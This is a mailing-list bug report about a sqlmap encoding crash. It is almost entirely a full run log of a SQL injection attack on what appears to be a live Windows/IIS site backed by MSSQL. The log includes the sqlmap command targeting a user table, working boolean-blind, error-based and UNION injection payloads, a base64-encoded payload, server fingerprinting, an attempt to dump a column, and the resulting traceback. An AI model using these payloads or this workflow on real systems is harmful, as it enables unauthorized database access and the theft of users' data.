[sqlmap-users] encode err ? thx

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql
--level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C
'最后登录时间' --dump --hex -v 3

    sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 00:51:25

[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter
values ('major=')waitfor delay'0:0:20'--') with most probably leftover
chars/statements from manual SQL injection test(s). Please, always use only
valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: major
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
('IRZo'='IRZo&station=&idxpage=2&ptopid=
    Vector: OR ([INFERENCE])

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
clause
    Payload: classid=&specialid=2&qstr=&major=-3052') OR
5359=CONVERT(INT,(SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
(5359=5359) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
('PLJO'='PLJO&station=&idxpage=2&ptopid=
    Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: UNION query
    Title: Generic UNION query (random number) - 16 columns
    Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
&station=&idxpage=2&ptopid=
    Vector:  UNION ALL SELECT
[QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--

---
[00:51:49] [WARNING] changes made by tampering scripts are not included in
shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [PAYLOAD]
LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'

Traceback (most recent call last):
  File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
    message = stdoutencode(self.format(record))
  File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
    retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
    action()
  File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
    conf.dbmsHandler.dumpTable()
  File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
dumpTable
    retVal = pivotDumpTable(table, colList, blind=False)
  File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
pivotDumpTable
    value = inject.getValue(query, blind=blind, union=not blind, error=not
blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
  File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
query, unpack, dump)
  File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
unionUse
    output = _oneShotUnionUse(expression, unpack)
  File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
_oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
    payload = function(payload=payload, headers=auxHeaders)
  File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
    return base64.b64encode(payload) if payload else payload
  File "/usr/lib/python2.7/base64.py", line 53, in b64encode
    encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position
147-152: ordinal not in range(128)

[*] shutting down at 00:51:50